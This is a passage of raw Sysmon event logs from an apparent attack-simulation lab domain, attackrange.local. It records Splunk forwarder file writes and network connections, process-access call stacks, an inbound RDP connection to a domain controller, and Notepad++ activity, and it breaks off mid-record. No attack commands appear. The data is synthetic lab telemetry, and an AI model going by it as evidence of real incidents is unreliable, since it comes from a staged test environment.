07:45:28.156{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806341Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:28.156{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F318-60EB-4879-00000000D001}3996C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806340Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:28.141{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F318-60EB-4879-00000000D001}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806339Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:28.141{0C1E0330-F318-60EB-4879-00000000D001}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806355Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:29.875{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F5BB7FBFB77472C085ADA4C1E5C4696,SHA256=9F075BA133861FFBF38FA4B69545623826652D2E25F06D2BAB2DA788F63E6A5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046444Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:29.687{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F864CDCD945534D728D2C815FE215491,SHA256=F70B46B0A31F83ADAB3358DF5E3C8789025BB1BAE576B072C01C12A27E74B791,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806354Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:29.375{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=59D94479E8E86C6669EABD7C00137283,SHA256=9DAD589CE577BFA57779AF798250A72D5B66F7319893DE976F54CA10CF693ADE,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000806358Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:30.891{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6345F0F5A31D2346FB9E1635C68E0DC4,SHA256=CC6E716C9D325742746672A38873C15FD82E901680148D3D586AF94655865C33,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046446Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:22.592{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50926-false10.0.1.12-8000- 23542300x80000000000000001046445Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:30.702{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6019046E462A3C0A8C2E29E7CD701248,SHA256=915F54774406F819FF728AD77C3597595AB3081D92767F3979CF7954E2456714,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806357Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:29.227{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57172-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806356Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:30.063{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL 
SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=C3568F37FFE31110A9AC50D5A8457E98,SHA256=9016F3688A7DE7FAC171E59D6A78D45DFB9B2A7C7A042246E86526B72E81040A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806359Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:31.922{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E2B186C27533F9B9B00BA5453746B04,SHA256=8B7C3EC26A63F808A73B9599911181ABC12853AD787C6D2D386541CBD42E2DA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046447Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:31.717{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4896EE401210F33F5D1FBD37DDAE46A3,SHA256=D689FE1406D2CF3D719B4E7A78609CE883DCC5FD2E2D3FBF104497C9C6CB2AFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806360Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:32.953{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69A7FBE79CDE803EF0C48771CE9069A5,SHA256=A816989E36B0DF929CF11D2105FFE2D440495CF324908A73E2DB8862CA329A20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046448Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:32.720{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6867BEE9E8E4BC0966F03687D9E1601E,SHA256=58A9FFD46AE7B1B330D78DF4F4F01D02CBE745AF6AC7379AF7F90BCDE14DED5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806361Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:33.957{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B990913CDAE356203AD1A024839CA40,SHA256=0D2090AF6E38224D0CB2FD8B939888076553767E95C6AB974ED29378CD0F20C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046451Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:33.771{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3557984796DCE25EA2FD01EF42408D19,SHA256=6F47C18854A33DEFA18BC157EF0B80994F03624FC6EF18DB6A0EF9C63E12FC88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046450Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:33.771{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B7B821F7B86B02A2294FFD052FBFDBC3,SHA256=832CCEF440B3984659C13C213530C7435390440388F20ABF8B3083FB75DCFD18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046449Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:33.732{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB73B33A15C03C97A36812351B3C3BB6,SHA256=6433533E01EC193CAA7F276A62AFFB4153A9CDDE25E9A3FD8F9C1AC3EDCA537B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806362Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:34.957{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C61E63A08A99F005038F08726138238,SHA256=ED6E373DB3B23016D20DCF9B2F2AE134ECA73531D1AE0B45CC0D220FC31B395E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046452Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:34.739{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4EFA884A2ADEB917C55023341B981C6,SHA256=4CD9BDC1BDDDA22A68572C030FF5468BE648178D05E1CC6680477DE4AC9E6593,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806363Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:35.973{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F245DA06DDD20B8C168770C5969A08EA,SHA256=8FB8ACC2D226CA53E2131D9CAFDAFB18CDC612287792210ED861D1681B83F965,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001046453Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:35.741{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CADFA8CC6D29A96239F2267AABD2E6ED,SHA256=5E8D85B66172A652BF28A1614272DADEEF863E68012B2C7F599D04F7F05AF712,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806365Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:36.973{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7024509B03FDD96FF17D7B3F73DD9E61,SHA256=F526321B70ABFB8D5A1DC11BDA1DAB515F8FB1973B727AC123F1F8A63751346D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046455Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:36.760{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C2C2133FFB6C293537C1BE6DEA3B9E3,SHA256=6B2F0B329DD9B1F6AC389DD62D4D45E217AD6289993EB8446D7FAB9049518BB6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806364Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:35.231{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57173-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 
354300x80000000000000001046454Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.772{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50927-false10.0.1.12-8000- 23542300x80000000000000001046458Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:37.774{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E8A3F3A1D60D8B796C5C14345506A5A,SHA256=C4379CE0BE5391972754D17065DE3D2502E73355BC1C7E842620FFE1ECFDB569,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046457Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:37.743{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\session.xmlMD5=27B91AA96770D85683AD75B32A91DE62,SHA256=CD9F0543256167E7A22EE22AC6A5B818D67A697AFB2DB34F328505503497B292,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046456Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:37.659{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3557984796DCE25EA2FD01EF42408D19,SHA256=6F47C18854A33DEFA18BC157EF0B80994F03624FC6EF18DB6A0EF9C63E12FC88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046520Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.990{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBF725C081D64FFA748542F83056A132,SHA256=D2EA28EEB09238293FEE4584C3CAA8DFD8C9D9A3E27ECA425FBBFBDCA29723CA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046519Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:29.959{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-52160-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001046518Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.974{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B8C49A67B6165D69DD2FAE37A7561FC,SHA256=64E473B66851AB54FE6E8E999942D8576729B06456C497B151B71CF464D8AD09,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046517Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.805{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001046516Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.805{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 
10341000x80000000000000001046515Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.805{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001046514Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.805{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001046513Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.805{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 
10341000x80000000000000001046512Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.805{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001046511Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.805{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
